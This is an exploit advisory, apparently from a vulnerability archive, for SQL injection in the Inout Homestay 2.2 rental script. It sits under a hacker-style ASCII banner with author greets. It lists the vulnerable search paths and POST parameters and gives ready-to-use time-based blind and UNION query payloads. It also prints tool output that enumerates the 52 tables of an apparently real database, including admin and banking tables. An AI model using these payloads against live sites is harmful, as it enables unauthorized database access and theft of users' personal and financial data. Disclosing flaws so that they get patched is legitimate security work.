Vulnerabilities

Inout Homestay 2.2 SQL Injection

┌┌──────────────────────────^ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : inoutscripts.com │
│ Vendor : Inout Scripts - Nesote Technologies Private Limited │
│ Software : Inout Homestay 2.2 │
│ Vuln Type: SQL Injection │
│ Impact : Database Access │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and │
│ damage to a company's reputation. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL

CryptoJob (Twitter) twitter.com/CryptozJob

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /index.php?page=search/searchdetailed

broom=1[Inject-HERE]&bathr=1[Inject-HERE]&beds=1[Inject-HERE]&location=Indianapolis, IN, USA&address=Indianapolis, IN, USA&lat=39.768403&longi=-86.158068&indate=&outdate=&numguest=2[Inject-HERE]&property1=1&property2=7&property3=4&option=1&pstart=all&pend=948&page=1&type=2&type=2&userseachstate=Indiana&userseachcity=Indianapolis

POST parameter 'broom' is vulnerable to SQLI
POST parameter 'bathr' is vulnerable to SQLI
POST parameter 'beds' is vulnerable to SQLI
POST parameter 'numguest' is vulnerable to SQLI


Path: /index.php?page=search/rentals

location=Indianapolis%2C+IN%2C+USA&indate=&outdate=&address=Indianapolis%2C+IN%2C+USA&lat=39.768403&long=-86.158068&guests=2[Inject-HERE]&searchcity=Indianapolis&searchstate=Indiana

POST parameter 'guests' is vulnerable to SQLI

---
Parameter: broom (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: broom=1 AND (SELECT 4813 FROM (SELECT(SLEEP(5)))Pudr)&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split

Type: UNION query
Title: Generic UNION query (NULL) - 27 columns
Payload: broom=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b787a71,0x564451596473794d69586f5a4677435270534b45566a6558734e4f5a72434279645855646f54456f,0x71786a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split
---

[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[INFO] fetching tables for database: '*****_homestay'
Database: *****_homestay

[52 tables]
+----------------------------------+
| admin_account |
| admin_payment_details |
| category_property |
| chat_details |
| chat_messages |
| checkout_ipn |
| countries |
| coupon_detail |
| cron_details |
| custom_field |
| demo_message |
| email_details |
| email_templates |
| forgetpassword |
| host_rejected |
| inout_ipns |
| languages |
| list_date_request |
| list_images |
| listing_date |
| listing_detail |
| listing_main |
| message_notify_app |
| messages |
| msg_req_temp |
| ppc_currency |
| public_side_media_detail |
| public_slide_images |
| refund_creditupdate |
| request_coupon_detail |
| settings |
| superhost_detail |
| traveller_bank_deposit_history |
| traveller_cancellation_modes |
| traveller_cancelled |
| user_account_detail |
| user_address_verify_request |
| user_details |
| user_email_verification |
| user_listing_request |
| user_refunddetails |
| user_registration |
| user_reviews |
| user_search_details |
| user_settings |
| user_wishlist_mapping |
| user_withdrawal_details |
| userabusereport |
| userbank_pending_listing_request |
| usercancellationsaction |
| wish_list |
| withdrawal_request |
+----------------------------------+

[-] Done